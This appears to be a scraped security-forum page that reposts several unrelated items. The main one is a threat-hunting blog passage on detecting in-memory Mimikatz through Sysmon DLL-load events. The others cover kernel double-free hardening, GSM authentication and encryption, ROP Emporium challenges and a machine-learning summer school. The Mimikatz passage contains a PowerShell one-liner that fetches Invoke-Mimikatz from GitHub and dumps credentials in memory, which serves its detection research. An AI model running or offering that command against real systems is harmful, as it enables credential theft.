(@HarmJ0y) has information on updating the Mimikatz DLLs in Invoke-Mimikatz (it’s not a very complicated process). The PowerShell Empire version of Invoke-Mimikatz is usually kept up to date. [Source] Figure 53. Empire's latest Invoke-Mimikatz script. Figure 54. Empire's latest Invoke-Mimikatz script. As shown before in figure 22 when we were getting ready to run the mimikatz binary, we want to make sure that we have a basic baseline of images/modules being loaded by PowerShell when it is opened and closed. Open and close PowerShell 4 times as shown in figure 55 below. Figure 55. Opening and closing PowerShell 4 times. We can see the same 72 images being loaded 4 times. It should show a total of 288, but there might have been a delay making it to the server. I probably refreshed my dashboard to soon and did not capture the last netutils.dll load which happens when PowerShell exits. Anyways, I think that we have a good basic baseline before running mimikatz reflectively in the same PowerShell process. Figure 56. Images loaded by PowerShell before running Mimikatz. Baselining how PowerShell will download Invoke-Mimikatz The easiest way to test Invoke-Mimikatz is by going to its github repo and downloading it before executing it in memory. We have to make sure that we understand what extra images PowerShell needs to load in order to perform network operations and download Invoke-Mimikatz as a string. We can use the same approach of opening and closing PowerShell and run only the commands that will pull the script as a string from Github without executing it yet as shown in figure 57 below. IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1') Figure 57. Running commands to only download Invoke-Mimikatz. Next, refresh your dashboard and as you already know, you will have most of the unique images count increased by one as shown in figure 58 below. Figure 58. Checking initial images loaded by PowerShell to download Invoke-Mimikatz from Github. Now, if you go to the page #4, you will start to see new unique images/modules. Those are images loaded by PowerShell to perform the "DownloadString" operation. You can go to page #5 too as shown in figure 60, and you will see more unique images. (You can expand your first visualization to see the long paths of a few images. The second visualization we added to the dashboard earlier will just move down) Figure 59. Unique Images loaded by PowerShell to download Invoke-Mimikatz from Github. Figure 60. More unique images loaded by PowerShell to download Invoke-Mimikatz from Github. Then, we can perform the same operation (Downloading Invoke-Mimikatz from Github as a string) to make sure we have a strong fingerprint for that particular action and avoid mixing it with images loaded when Mimikatz is executed in memory. I opened PowerShell three times, executed the same commands to only download Invoke-Mimikatz as a string, and closed them all as shown in figure 61. Figure 61. Downloading Invoke-Mimikatz as a string three times. Then, you will see that the counts for the initial images loaded by PowerShell were increased by 3, but if you go to page #5 as shown in figure 63, you can see our "DownloadString" images loaded 4 times. Figure 62. Images loaded by PowerShell after downloading Invoke-Mimikatz as a string 3 more times. Figure 63. Images loaded by PowerShell after downloading Invoke-Mimikatz as a string 3 more times. Running Mimikatz in Memory to get started run PowerShell as administrator. Figure 64. Running PowerShell as Administrator. In order to download Invoke-Mimikatz as a string from Github and run it in memory, type the following commands: IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds Figure 65. Running Mimikatz in memory. You will of course get the same results as when it was run on disk. Close your PowerShell console. Figure 66. Results from running Mimikatz. Analyzing In-Memory Mimikatz Results After closing PowerShell, refresh your dashboard (Make sure you have the right Time Range), and you will see that our initial default images loaded by PowerShell were only increased by 1 and not by 2 as when we ran Mimikatz on disk. This is because the Mimikatz binary is run reflectively inside of PowerShell, and several of the modules needed are already loaded by PowerShell itself. Figure 67. Images loaded by PowerShell when Mimikatz is executed reflectively in memory. Next, if you go to page #5, you will see that the images loaded during the "DownloadString" operation increased by one (count of 5 now as expected). In addition, we can see one of the images that was also loaded while executing Mimikatz on disk: C:\Windows\System32\WinSCard.dll However, there are four new images that were loaded when Mimikatz was executed reflectively in memory. (I will explain later why those get loaded when we run Invoke-Mimikatz) C:\Windows\System32\whoami.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\WMINet_Utils.dll C:\Windows\System32\NapiNSP.dll C:\Windows\System32\RpcRtRemote.dll Figure 68. Images loaded by PowerShell when Mimikatz is executed reflectively in memory. On page #6, we can also see a few new images that we did not see when Mimikatz ran on disk. (I will explain later why those get loaded when we run Invoke-Mimikatz). C:\Windows\System32\nlaapi.dll C:\Windows\System32\ntdsapi.dll C:\Windows\System32\pnrpnsp.dll C:\Windows\System32\wbem\fastprox.dll C:\Windows\System32\wbem\wbemprox.dll C:\Windows\System32\wbem\wbemsvc.dll C:\Windows\System32\wbem\wmiutils.dll C:\Windows\System32\wbemcomn.dll C:\Windows\System32\winrnr.dll However, we can also see almost the rest of the images that were loaded when Mimikatz was executed on disk. C:\Windows\System32\apphelp.dll C:\Windows\System32\cryptdll.dll C:\Windows\System32\hid.dll C:\Windows\System32\logoncli.dll C:\Windows\System32\netapi32.dll C:\Windows\System32\samlib.dll C:\Windows\System32\vaultcli.dll C:\Windows\System32\wintrust.dll C:\Windows\System32\wkscli.dll I dont see the following modules (Loaded by Mimikatz on disk) as unique ones anymore (count 1). This is because they are used to handle encryption and were part of the "DownloadString" operation base-lining. We handled encrypted traffic with Github so it makes sense. It is safe to say that those modules will be noisy (it does not mean that they do not get loaded while running Mimikatz in Memory though. It is just that PowerShell loads them first to handle the encrypted traffic.) C:\Windows\System32\bcrypt.dll C:\Windows\System32\bcryptprimitives.dll C:\Windows\System32\ncrypt.dll Figure 69. Images loaded by PowerShell when Mimikatz is executed reflectively in memory. You can reduce the width of the first visualization and the second one that we added earlier should move back up next to the first one. This is just so that you can see the total number of images loaded by PowerShell at the end of this test. Figure 70. Images loaded by PowerShell when Mimikatz is executed reflectively in memory. In order to document your findings, export the results to a CSV file by clicking on the option "formatted" below the "Images_Loaded" results, and save it to your computer as shown in figure 71. Figure 71. Exporting results to a CSV file. Comparing Results As we can see in figure 72 below, it does not matter if Mimikatz is executed on disk or in memory. It still loads the same extra modules it needs in order to work. Most of the modules that Mimikatz needs are already loaded by PowerShell depending on what happens before running script, but we can still see a few unique ones that could allow us to create a basic fingerprint for In-memory Mimikatz. For example, if we take out the 3 modules used for encryption, we can use the other 10 to create a basic detection rule. We could hunt by grouping the following modules being loaded in a second or four seconds bucket time. C:\Windows\System32\WinSCard.dll C:\Windows\System32\apphelp.dll C:\Windows\System32\cryptdll.dll C:\Windows\System32\hid.dll C:\Windows\System32\logoncli.dll C:\Windows\System32\netapi32.dll C:\Windows\System32\samlib.dll C:\Windows\System32\vaultcli.dll C:\Windows\System32\wintrust.dll C:\Windows\System32\wkscli.dll Figure 72. Comparing results on-disk and in-memory. What about whoami.exe? We could add that to our basic In-memory Mimikatz fingerprint. If an adversary is using the exact Invoke-Mimikatz script from the Empire Project, then it will reduce the number of false positives. The whoami part is defined in the main function of Invoke-Mimikatz as you can see in figure 73 below. It is important to note that Invoke-Mimikatz from PowerSploit does not have this command in the script. Figure 73. Whoami utilized in Invoke-Mimikatz. What about the modules loaded from the wbem directory and WMINet_Utils? All that is part of Windows Management Instrumentation (WMI) technology. It provides access to monitor, command, and control any managed object through a common, unifying set of interfaces, regardless of the underlying instrumentation mechanism. WMI is an access mechanism.[Source]. But, why do they get loaded when we run Mimikatz in Memory? It is because of a simple command used in the Invoke-Mimikatz script to verify if the PowerShell Architecture (32/bit/64bit) matches the OS architecture. Most of the modules in question were pointing to WMI activity so I just accessed the code and looked for any signs of WMI. Invoke-Mimikatz uses the command "Get-WmiObject" and the class "Win32_Processor" to find out information about the CPU and to get the "AddressWidth" value which is used to verify the OS Architecture as shown in figure 74 below. Figure 74. WMI in Invoke-Mimikatz. So I tested that command in my computer and logged all the modules being loaded by PowerShell. I refreshed my dashboard and I saw that all the modules in question were loaded while executing the following command: get-wmiobject -class Win32_Processor Figure 75. Executing get-wmiobject with class Win32_Processor to get information about the CPU. Figure 76. Images loaded after using WMI. I want to point out that the following modules can generate a lot of false positives since they can be triggered by simple office applications (x86/x64) and the use of Internet Browsers such as Internet Explorer as shown in figure 77 below: C:\Windows\System32\nlaapi.dll C:\Windows\System32\ntdsapi.dll Figure 77. Images loaded after using WMI. In addition, in my opinion, depending on how much WMI is used in your environment, it might be a good idea to start monitoring for at least: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\WMINet_Utils.dll You can test that in your environment and see how noisy it can get. Log for WMINet_Utils.dll in .NET versions available in your gold image. On the other hand, most of the rest of the modules are loaded by several third-party and built-in applications, so they are too noisy and could cause a big number of false positives: C:\Windows\System32\nlaapi.dll C:\Windows\System32\ntdsapi.dll C:\Windows\System32\pnrpnsp.dll C:\Windows\System32\wbem\fastprox.dll C:\Windows\System32\wbem\wbemprox.dll C:\Windows\System32\wbem\wbemsvc.dll C:\Windows\System32\wbem\wmiutils.dll C:\Windows\System32\wbemcomn.dll C:\Windows\System32\winrnr.dll So far, our detection strategy is still to look for the following 10 modules: C:\Windows\System32\WinSCard.dll C:\Windows\System32\apphelp.dll C:\Windows\System32\cryptdll.dll C:\Windows\System32\hid.dll C:\Windows\System32\logoncli.dll C:\Windows\System32\netapi32.dll C:\Windows\System32\samlib.dll C:\Windows\System32\vaultcli.dll C:\Windows\System32\wintrust.dll C:\Windows\System32\wkscli.dll How can we test our group of modules and tune it to reduce false positives? Before thinking on deploying a detection rule like this to your Sysmon config in production, I highly recommend to get a gold image and log every single module loaded by every process or application in the system. I tested this in my own environment at home. Edit and Update your Sysmon config Open the sysmon configuration we used for our initial tests and set it to not exclude anything from Event ID 7 - Image Load (Log everything) as shown in figure 79 below. Figure 78. Editing current sysmon config. Figure 79. Editing current sysmon config. Open cmd.exe as administrator and run the following commands as shown in figure 80 below: sysmon.exe -c [edited sysmon xml file] Then, confirm that the changes were applied by running the following command: sysmon.exe -c (You will see that now everything for ImageLoad is being logged) Figure 80. Updating Rule configurations. Open several applications We are logging every single Image loaded in our system on the top of our Invoke-Mimikatz findings (DO NOT DELETE/CLEAR YOUR INDEX). We can now open and close applications that a user most likely uses in an organization (Depending on the type of job) as shown in figure 81. Figure 81. Open applications on your testing machine. Make sure that you also have the right Time range assigned to your dashboard since we are still using the logs we gathered from when we ran Invoke-Mimikatz. I set mine to Last 1 hour as shown in figure 83. Figure 82. Adjusting Time Range. Refresh your dashboard and you will see a lot of modules being loaded as shown in figure 83 below. You can adjust your visualizations if you want to. That will allow you to see more than 200 images being loaded on your box (That is how many records we set our Images_Loaded to show) Figure 83. Several images being loaded. Hunt for the group of 10 modules Next, with all that data, we can query for the 10 modules of our initial In-Memory Mimikatz fingerprint as shown in figure 84 and 85 below. "WinSCard.dll", "apphelp.dll", "cryptdll.dll", "hid.dll", "logoncli.dll", "netapi32.dll", "samlib.dll", "vaultcli.dll", "wintrust.dll", "wkscli.dll" You will see that 5 out of the 10 modules are still unique from our basic fingerprint (Most of them are used to manage authentication security components and features of the system) as shown in figure 84 below. C:\Windows\System32\WinSCard.dll C:\Windows\System32\cryptdll.dll C:\Windows\System32\hid.dll C:\Windows\System32\samlib.dll C:\Windows\System32\vaultcli.dll You might be thinking why not netapi32.dll? (It was actually loaded 2 more times. It does not mean that netapi32.dll is not considered a common binary needed for authentication support. However, since it seems to be used by a few other applications, I rather filter that one out) Figure 84. Querying for only In-memory Mimikatz fingerprint. If you want to know what modules/images are being loaded by a specific Image on the EventID7_Images visualization, click on one of them and a filter will be created to show you only images loaded related to your selection. For example, Excel apparently loads apphelp.dll and wintrust.dll from our list of 10 as shown in figure 85 below. Figure 85. What is loading what?. Or vice-versa you can click on the loaded image and it will filter everything out to show you the Images that loaded that specific module as shown in figure 86. Figure 86. What is loading what? What about other operations where Authentication components are involved? I cleaned/deleted my index and started paying attention to authentication operations such as logging onto web applications or my computer after rebooting it. Logging onto the Kibana Web Interface I opened IE , and the first two modules out of the 10 that get loaded are wintrust.dll and apphelp.dll. Then, I browsed to my ELK's IP address and got a prompt to enter my credentials. I noticed that for IE to do all this, it needed to load 5 out of the 10 modules needed by Mimikatz also as shown in figure 87 below. 3 out of those 5 are still part of the ones required for authentication support. samlib.dll WinSCard.dll vaultcli.dll Figure 87. Images loaded by IE while authenticating to Kibana. Logging onto my system after rebooting it The following processes shown in figure 88 below are the first processes that get started when a system boots up. (The ones with the grayed icons are processes that have already exited the system) Figure 88. Images loaded by the first processes that get started by your system when it boots up. So what happens when we look for the 5 modules that so far are considered part of the combination with less false positives against the processes shown in figure 88? "WinSCard.dll", "cryptdll.dll", "hid.dll", "samlib.dll", "vaultcli.dll" As you can see below in figure 89, there were hits for all of them but by processes involving authentication. The one with the more hits was "LogonUI.exe" Figure 89. "Credential Providers" modules used by a few processes. When conducting research on that particular process (LogonUI.exe) for a training class I put together for some colleagues, I found out the following: "Whenever a user hits Ctrl-Alt-Del, winlogon.exe switches to another desktop and launches a special program, logonui.exe, to interact with the user. The user may be logging on initially, (un)locking the desktop, changing her password or some other task, but the user is interacting with logonui.exe on a special desktop, not winlogon.exe on the default desktop. When authenticating, logonui.exe loads DLLs called "credential providers" which can handle the password, smart card or, with a third-party provider, biometric information, to authenticate against the local SAM database, Active Directory, or some other third-party authentication service." [Source] Therefore, all those 5 modules being loaded together by other processes handling credentials would make sense. We could use this knowledge to filter out a few processes where one would normally enter credentials to authenticate to a certain service or application. For example, processes such as Chrome, IE or even outlook (known for asking your password 50 times a day) would load those modules. SSO via your browser would also load most of those images. Final Thoughts Even though this is just part I of detecting In-memory Mimikatz, we are already coming up with a basic fingerprint that will allow us to reduce the number of false positives when hunting for this tool when it is executed in memory. Based on the number of tests performed, a basic fingerprint for In-memory Mimikatz from a modules perspective could be: C:\Windows\System32\WinSCard.dll C:\Windows\System32\cryptdll.dll C:\Windows\System32\hid.dll C:\Windows\System32\samlib.dll C:\Windows\System32\vaultcli.dll If you can afford (enough space) to log one more image being loaded in your environment, I think it would be a good idea to monitor for the following module. I only see it being loaded by PowerShell after launching several other applications and logging the modules being loaded. C:\Windows\Microsoft.NET\Framework64\[Versions available]\WMINet_Utils.dll Hunting Technique recommended Grouping [Source] "Grouping consists of taking a set of multiple unique artifacts and identifying when multiple of them appear together based on certain criteria. The major difference between grouping and clustering is that in grouping your input is an explicit set of items that are each already of interest. Discovered groups within these items of interest may potentially represent a tool or a TTP that an attacker might be using. An important aspect of using this technique consists of determining the specific criteria used to group the items, such as events having occurred during a specific time window.This technique works best when you are hunting for multiple, related instances of unique artifacts, such as the case of isolating specific reconnaissance commands that were executed within a specific timeframe." Therefore, the idea is to group the 5 images/modules mentioned above being loaded in a 1-5 seconds bucket time while possibly filtering out known processes performing that type of behavior. Only a few processes, as far as I can tell, load all 5 modules (not just one or 2 or 3 or 4) during authentication operations. In addition, NONE of the other processes launched during testing loaded the 5 modules together with the WMINet_Utils.dll one. Therefore, I see the value in grouping them together and seeing what processes are loading all of those in a short period of time (seconds). Once again, this is just part I, and in future posts I will group this approach with other chains of events in order to reduce the number of false positives while hunting for In-Memory Mimikatz. Let me know how it works out for you when logging for those specific modules in your organization. I would highly recommend to take this approach in a gold image first and then log one module at a time to test which might cause several false positives. I would love to hear your results! Feedback is greatly appreciated! Thank you. Update (03/21/2017) Mimikatz New version released 2.1.1 20170320 Extra DLL loaded: "Winsta.dll" Really noisy one so it does not change our basic fingerprint. References: Security Management Components Authentication Security Components Exfiltration/Get-VaultCredential.ps1 PowerSploit - Invoke-Mimikatz Empire Project - Invoke-Mimikatz Process Hacker - SANS Wardog at 8:21 PM Sursa: https://cyberwardog.blogspot.ro/2017/03/chronicles-of-threat-hunter-hunting-for.html?m=1
      • 1
      • Upvote
  19. Protecting the irreplaceable | www.f-secure.com Kimmo Kasslin, 26th Feb 2014 •T-110.6220 Special Coursein Information Security Slides: http://www.cse.tkk.fi/fi/opinnot/T-110.6220/2014_Reverse_Engineering_Malware_AND_Mobile_Platform_Security_AND_Software_Security/luennot-files/T1106220.pdf
      • 2
      • Upvote
  20. La cum scriu eu cod, nici macar eu nu mai stiu ce, cand, de ce si cum am scris, ce sa mai zic de niste analize heuristice...
  21. August 30, 2017 Blocking double-free in Linux kernel On the 7-th of August the Positive Technologies expert Alexander Popov gave a talk at SHA2017. SHA stands for Still Hacking Anyway, it is a big outdoor hacker camp in Netherlands. The slides and recording of Alexander's talk are available. This short article describes some new aspects of Alexander's talk, which haven't been covered in our blog. The general method of exploiting a double-free error is based on turning it into a use-after-free bug. That is usually achieved by allocating a memory region of the same size between double free() calls (see the diagram below). That technique is called heap spraying. However, in case of CVE-2017-2636, which Alexander exploited, there are 13 buffers freed straightaway. Moreover, the double freeing happens at the beginning. So the usual heap spraying described above doesn't work for that vulnerability. Nevertheless, Alexander has managed to turn that state of the system into a use-after-free error. He abused the naive behaviour of SLUB, which is currently the main Linux kernel allocator. It turned out that SLUB allows consecutive double freeing of the same memory region. In contrast, GNU C library allocator has a "fasttop" check against it, which introduces a relatively small performance penalty. The idea is simple: report an error on freeing a memory region if its address is similar to the last one on the allocator's "freelist". A similar check in SLUB would block some double-free exploits in Linux kernel (including Alexander's PoC exploit for CVE-2017-2636). So Alexander modified set_freepointer() function in mm/slub.c and sent the patch to the Linux Kernel Mailing List (LKML). It provoked a lively discussion. The SLUB maintainers didn't like that this check: introduces some performance penalty for the default SLUB functionality; duplicates some part of already existing slub_debug feature; causes a kernel oops in case of a double-free error. Alexander replied with his arguments: slub_debug is not enabled in Linux distributions by default (due to the noticeable performance impact); when the allocator detects a double-free, some severe kernel error has already occurred on behalf of some process. So it might not be worth trusting that process (which might be an exploit). Finally Kees Cook helped to negotiate adding Alexander's check behind CONFIG_SLAB_FREELIST_HARDENED kernel option. So currently the second version of Alexander's patch is accepted and applied to the linux-next branch. It should get to the Linux kernel mainline in the nearest future. We hope that in future some popular Linux distribution will provide the kernel with the security hardening options (including CONFIG_SLAB_FREELIST_HARDENED) enabled by default. Author Positive Research at 7:01 AM Sursa: http://blog.ptsecurity.com/2017/08/linux-block-double-free.html?
  22. DISSECTING GSM ENCRYPTION AND LOCATION UPDATE PROCESS 31/08/2017 0 Comments in Blog by Rashid Feroze Have you ever wondered as what happens when you turn on your mobile phone? How does it communicate to the network in a secure manner? Almost all of us would have read about TCP/IP and many of us would be experts in it but when it comes to telecom, very few know about how it actually works from inside. What’s the message structure in gsm? What kind of encryption it uses? So, today we will talking in detail about the encryption standards of gsm and how the mobile phone update it’s location to the mobile network. WHAT HAPPENS WHEN YOU TURN ON YOUR CELL PHONE? When you turn on your cell phone, It first initiates it’s radio resource and mobility management process. The phone receives a list of frequencies supported on the neighbouring cells either by the SIM or from the network. It camps on a cell depending upon the power level and the mobile provider. After that, It performs a location update process to the network where the authentication happens. After a successful location update, the mobile phone gets it’s TMSI and it is ready to do other operations now. Now, let’s verify the above statements by having a look at the mobile application debug logs. The below screenshots are from the osmocom mobile application which simulates a mobile phone working on a PC. Mobile network information sent by SIM Camping on a cell Location update requested which includes it’s LAI and TMSI Location updating accepted and used encryption standard visible. OBJECTIVE We would capture gsm data in wireshark through osmocom-bb and analyse how the entire process of gsm authentication and encryption happens. We will also see how the location update process happens. We have already talked in detail about osmocom-bb and call setup process in our last blog. We would be skipping that part in this blogpost. GSM ENCRYPTION STANDARDS A5/0 – No encryption used. Just for the sake of completeness. A5/1 – A5/1 is a stream cipher used to provide over-the-air communication privacy in the GSM cellular telephone standard. It is one of seven algorithms which were specified for GSM use. It was initially kept secret, but became public knowledge through leaks and reverse engineering. A number of serious weaknesses in the cipher have been identified. A5/2 – A5/2 is a stream cipher used to provide voice privacy in the GSM cellular telephone protocol. It was used for export instead of the relatively stronger (but still weak) A5/1. It is one of seven A5 ciphering algorithms which have been defined for GSM use. A5/3 (Kasumi) – KASUMI is a block cipher used in UMTS, GSM, and GPRS mobile communications systems. In UMTS, KASUMI is used in the confidentiality and integrity algorithms with names UEA1 and UIA1, respectively. In GSM, KASUMI is used in the A5/3 key stream generator and in GPRS in the GEA3 key stream generator. There are some others also but the above mentioned are used in majority. HOW GSM AUTHENTICATION AND ENCRYPTION HAPPENS? Every GSM mobile phone has a Subscriber Identity Module (SIM). The SIM provides the mobile phone with a unique identity through the use of the International Mobile Subscriber Identity (IMSI). The SIM is like a key, without which the mobile phone can’t function. It is capable of storing personal phone numbers and short messages. It also stores security related information such as the A3 authentication algorithm, the A8 ciphering key generating algorithm, the authentication key (KI) and IMSI. The mobile station stores the A5 ciphering algorithm. AUTHENTICATION The authentication procedure checks the validity of the subscriber’s SIM card and then decides whether the mobile station is allowed on a particular network. The network authenticates the subscriber through the use of a challenge-response method. First, a 128 bit random number (RAND) is transmitted to the mobile station over the air interface. The RAND is passed to the SIM card, where it is sent through the A3 authentication algorithm together with the Ki. The output of the A3 algorithm, the signed response (SRES) is transmitted via the air interface from the mobile station back to the network. On the network, the AuC compares its value of SRES with the value of SRES it has received from the mobile station. If the two values of SRES match, authentication is successful and the subscriber joins the network. The AuC actually doesn’t store a copy of SRES but queries the HLR or the VLR for it, as needed. Generation of SRES ANONYMITY When a new GSM subscriber turns on his phone for the first time, its IMSI is transmitted to the AuC on the network. After which, a Temporary Mobile Subscriber Identity (TMSI) is assigned to the subscriber. The IMSI is rarely transmitted after this point unless it is absolutely necessary. This prevents a potential eavesdropper from identifying a GSM user by their IMSI. The user continues to use the same TMSI, depending on the how often, location updates occur. Every time a location update occurs, the network assigns a new TMSI to the mobile phone. The TMSI is stored along with the IMSI in the network. The mobile station uses the TMSI to report to the network or during call initiation. Similarly, the network uses the TMSI, to communicate with the mobile station. The Visitor Location Register (VLR) performs the assignment, the administration and the update of the TMSI. When it is switched off, the mobile station stores the TMSI on the SIM card to make sure it is available when it is switched on again. ENCRYPTION AND DECRYPTION OF DATA GSM makes use of a ciphering key to protect both user data and signaling on the vulnerable air interface. Once the user is authenticated, the RAND (delivered from the network) together with the KI (from the SIM) is sent through the A8 ciphering key generating algorithm, to produce a ciphering key (KC). The A8 algorithm is stored on the SIM card. The KC created by the A8 algorithm, is then used with the A5 ciphering algorithm to encipher or decipher the data. The A5 algorithm is implemented in the hardware of the mobile phone, as it has to encrypt and decrypt data on the fly. Generation of encryption key(Kc) Data encryption/decryption using Kc GSM AUTHORIZATION/ENCRYPTION STEPS GSM authorization/encryption process 1. When you turn on your mobile for the first time, the MS sends it’s IMSI to the network. 2. when a MS requests access to the network, the MSC/VLR will normally require the MS to authenticate. The MSC will forward the IMSI to the HLR and request authentication Triplets. 3. When the HLR receives the IMSI and the authentication request, it first checks its database to make sure the IMSI is valid and belongs to the network. Once it has accomplished this, it will forward the IMSI and authentication request to the Authentication Center (AuC). The AuC will use the IMSI to look up the Ki associated with that IMSI. The Ki is the individual subscriber authentication key. It is a 128-bit number that is paired with an IMSI when the SIM card is created. The Ki is only stored on the SIM card and at the AuC. The Auc will also generate a 128-bit random number called the RAND. The RAND and the Ki are inputted into the A3 encryption algorithm. The output is the 32-bit Signed Response (SRES). The SRES is essentially the “challenge” sent to the MS when authentication is requested. The RAND, SRES, and Kc are collectively known as the Triplets. The HLR will send the triplets to the MSC/VLR. 4. The VLR/MSC will then forward only the RAND value to the MS. 5. The MS calculates SRES using Ki stored in it’s sim and RAND value send by the network. The MS send this SRES value back to the MSC/VLR. 6. The MSC/VLR matches the SRES value with the one that HLR sent to it. If it matches, it successfully authorizes the MS. 7. Once authenticated, both the mobile and the network generates Kc using the Ki and RAND value with the help of A8 algorithm. 8. The data is then encrypted/decrypted using this uniquely generated key(Kc) with A5 ciphering algorithm. LOCATION UPDATE STEPS. Location update process 1. When you turn on your cellphone, it first tells the network that yes I am here and I want to register to the network. After that It sends a location update request which include it’s previous LAI, It’s TMSI. 2. After receiving the TMSI, if the TMSI does not exists in it’s databse, the VLR asks for IMSI and after recieving the IMSI the VLR asks the HLR for the subscriber info based on his IMSI. Here, if the VLR does not find the TMSI in it’s database, it will find the address of the old VLR which the MS was connected to using the LAI. A request is sent to the old VLR, requesting the IMSI of the subscriber. VLR provides the IMSI corresponding to the TMSI sent by the MS. Note that the IMSI could have been obtained from the mobile. That is not a preferred option as the Location Updating Request is sent in clear so it could be used to determine the association between the IMSI and TMSI. 3. The HLR in turn asks the AuC for the triplets for this IMSI. The HLR forwards the triplets(Rand,Kc,SRES) to the VLR/MSC. 3. The MSC will take details from the VLR and pass only the RAND value to the MS. The MS will compute the SRES again and will send it back to the MSC. 4. The MSC will verify the SRES stored in the VLR and will compare to the SRES sent by the MS. If both matches then the location update is successful. 5. After it is successful, HLR update happens and it will update it’s current location and TMSI is allocated to this MS. Since the TMSI assignment is being sent after ciphering is enabled, the relationship between TMSI and the subscriber cannot be obtained by unauthorized users. The GSM mobile replies back indicating that the new TMSI allocation has been completed. Now, we will analyze the gsm packets in wireshark and check what’s really happening over the air. Immediate assignment – Radio channel requested by MS and radio channel allocated to MS by the MS provider. We can also see what kind of control channel (SDCCH/SACCH) is being used here in the channel description. 2. Location update requested – The MS sends a location update request which include it’s previous LAI and it’s TMSI. 3. Authentication request – The VLR/MSC will forward the RAND which it got from the HLR to the MS. We can clearly see the random value that the network sent to the mobile. 4. SRES generation in MS – The MS will generate the SRES value using the A3 authentication algorithm with the help of Ki stored in the sim. 5. Authentication response – The MS will send the SRES value which it calculated. We can clearly see the SRES value here. 6. Ciphering mode command – The BSC sends the CIPHERING MODE COMMAND to the mobile. Ciphering has already been enabled, so this message is transmitted with ciphering. The mobile replies back to it with mode CIPHERED. We can also see the Ciphering mode complete packet below. We can see that it is using A5/1 cipher. 7. Location updating accepted – After the successful authentication, location update happens where the MS give it’s location information to the network. 8. TMSI reallocation complete – The MS provider will allocate a TMSI to the MS and this message would be encrypted so that no one can sniff the identity of the user (TMSI). 9. Radio channel release – The allocated radio channel is released by the MS. WHAT NOW? It was noticed that sometimes operators didn’t use any encryption at all so that they can handle more load on the network. The encryption/decryption process increases the overhead. Sometimes, there are issues in the configuration of the authentication process which can be used by an attacker to bypass the complete authentication. GSM Security is a huge unexplored field where a lot has still to be explored and done. Now, when you know how to analyze the gsm data upto the lowest level, you can read, analyze and modify the code of osmocom in order to send arbitrary frames to the network or from the network to the phone. You can start fuzzing gsm level protocols in order to find out if you can actually crash any network device. There is a lot to do but that would require a very deep understanding of the gsm networks and also about the legal aspects around this. I would suggest you to create your own gsm network and run your tests on that if you want to go ahead with this. We will be posting more blog posts on gsm. Stay tuned! REFERENCES https://www.sans.org/reading-room/whitepapers/telephone/gsm-standard-an-overview-security-317 http://mowais.seecs.nust.edu.pk/encryption.shtml Sursa: http://payatu.com/dissecting-gsm-encryption-location-update-process/
      • 1
      • Upvote
  23. ROP Emporium Learn return-oriented programming through a series of challenges designed to teach ROP techniques in isolation, with minimal reverse-engineering and bug-hunting. Beginner's Guide All Challenges ret2win ret2win means 'return here to win' and it's recommended you start with this challenge. Visit the challenge page by clicking the link above to learn more. split Combine elements from the ret2win challenge that have been split apart to beat this challenge. Learn how to use another tool whislt crafting a short ROP chain. callme Chain calls to multiple imported methods with specific arguments and see how the differences between 64 & 32 bit calling conventions affect your ROP chain. write4 Find and manipulate gadgets to construct an arbitrary write primitive and use it to learn where and how to get your data into process memory. badchars Learn to deal with badchars, characters that will not make it into process memory intact or cause other issues such as premature chain termination. fluff Sort the useful gadgets from the fluff to construct another write primitive in this challenge. You'll have to get creative though, the gadgets aren't straight forward. pivot Stack space is at a premium in this challenge and you'll have to pivot the stack onto a second ROP chain elsewhere in memory to ensure your success. Sursa: https://ropemporium.com/
      • 1
      • Thanks
  24. CEH, CISSP?
  25. Deep Learning (DLSS) and Reinforcement Learning (RLSS) Summer School, Montreal 2017 Deep neural networks that learn to represent data in multiple layers of increasing abstraction have dramatically improved the state-of-the-art for speech recognition, object recognition, object detection, predicting the activity of drug molecules, and many other tasks. Deep learning discovers intricate structure in large datasets by building distributed representations, either via supervised, unsupervised or reinforcement learning. The Deep Learning Summer School (DLSS) is aimed at graduate students and industrial engineers and researchers who already have some basic knowledge of machine learning (and possibly but not necessarily of deep learning) and wish to learn more about this rapidly growing field of research. In collaboration with DLSS we will hold the first edition of the Montreal Reinforcement Learning Summer School (RLSS). RLSS will cover the basics of reinforcement learning and show its most recent research trends and discoveries, as well as present an opportunity to interact with graduate students and senior researchers in the field. The school is intended for graduate students in Machine Learning and related fields. Participants should have advanced prior training in computer science and mathematics, and preference will be given to students from research labs affiliated with the CIFAR program on Learning in Machines and Brains. Deep Learning Summer School [syn] 630 views, 1:26:30 Machine Learning Doina Precup [syn] 223 views, 3:03:15 Neural Networks Hugo Larochelle [syn] 320 views, 1:25:47 Recurrent Neural Networks (RNNs) Yoshua Bengio [syn] 81 views, 1:30:25 Probabilistic numerics for deep learning Michael Osborne [syn] 211 views, 1:18:03 Generative Models I Ian Goodfellow 34 views, 34:51 Theano Pascal Lamblin [syn] 42 views, 1:05:58 AI Impact on Jobs Michael Osborne [syn] 71 views, 1:28:54 Introduction to CNNs Richard Zemel 1:28:22 Structured Models/Advanced Vision Raquel Urtasun [syn] 177 views, 55:15 Torch/PyTorch Soumith Chintala [syn] 48 views, 1:28:25 Generative Models II Aaron Courville [syn] 81 views, 1:24:30 Natural Language Understanding Phil Blunsom [syn] 40 views, 1:23:42 Natural Language Processing Phil Blunsom 62 views, 15:25 Bayesian Hyper Networks David Scott Krueger 14:01 Gibs Net Alex Lamb 196 views, 12:23 Pixel GAN autoencoder Alireza Makhzani 48 views, 16:16 CRNN's Rémi Leblond, Jean-Baptiste Alayrac [syn] 94 views, 1:23:34 Deep learning in the brain Blake Aaron Richards [syn] 70 views, 1:32:38 Theoretical Neuroscience and Deep Learning Theory Surya Ganguli [syn] 108 views, 1:23:14 Marrying Graphical Models & Deep Learning Max Welling 127 views, 1:21:05 Learning to Learn Nando de Freitas [syn] 36 views, 1:18:12 Automatic Differentiation Matthew James Johnson [syn] 54 views, 1:30:25 Combining Graphical Models and Deep Learning Matthew James Johnson 24 views, 12:52 Domain Randomization for Cuboid Pose Estimation Jonathan Tremblay 21 views, 15:48 tbd Rogers F. Silva 106 views, 16:26 What Would Shannon Do? Bayesian Compression for DL Karen Ullrich 21 views, 13:13 On the Expressive Efficiency of Overlapping Architectures of Deep Learning Or Sharir 